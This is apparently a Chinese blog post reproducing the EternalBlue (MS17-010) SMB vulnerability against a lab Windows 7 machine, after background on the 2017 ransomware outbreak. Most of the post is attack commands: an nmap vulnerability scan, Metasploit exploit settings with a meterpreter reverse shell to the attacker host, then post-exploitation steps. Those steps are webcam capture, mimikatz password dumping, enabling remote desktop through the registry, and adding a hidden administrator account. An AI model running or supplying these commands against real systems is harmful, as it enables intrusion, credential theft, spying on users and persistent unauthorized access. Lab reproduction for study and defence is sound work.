漏洞影响
2017年5月12日起,全球范围内爆发基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,这是不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。
五个小时内,包括英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件,对重要数据造成严重损失。
目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
漏洞描述
“永恒之蓝”漏洞通过445和139端口利用SMBv1和NBT中的RCE,从而扫描互通网段中开放445文件共享端口的Windows机器,循环反复,受攻击机器呈指数级数度增长。
该漏洞无需用户操作,只需要受攻击机器能够上网,就会被植入勒索软件、远控木马以及挖矿程序等。
复现环境
Windows 7 ultimate sp1 x64MSFNMAP
漏洞复现
Nmap扫描
whereis nmap cd /usr/share/nmap/scripts ls | grep "ms17-010" nmap --script smb-vuln-ms17-010.nse 192.168.173.138 |
扫描结果显示,该系统存在漏洞。
MSF监听
search ms17-010 use exploit/windows/smb/ms17_010_eternalblue set rhosts 192.168.173.138 set lhost 192.168.173.1 set payload windows/x64/meterpreter/reverse_tcp exploit |
提权
meterpreter > getuid #获取uid meterpreter > screenshot #截图 meterpreter > webcam_scream #抓拍 meterpreter > load mimikatz #获取系统密码 meterpreter > wdigest #获取系统密码 meterpreter > run post/windows/manage/enable_rdp #开启远程桌面 rdesktop 192.168.173.138 #登录远程桌面 #开启远程桌面(修改注册表) REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f net user root$ root /add net localgroup administrators root$ /add |
原创文章,作者:小嵘源码,如若转载,请注明出处:https://www.lcpttec.com/ldfx/
微信扫一扫 
支付宝扫一扫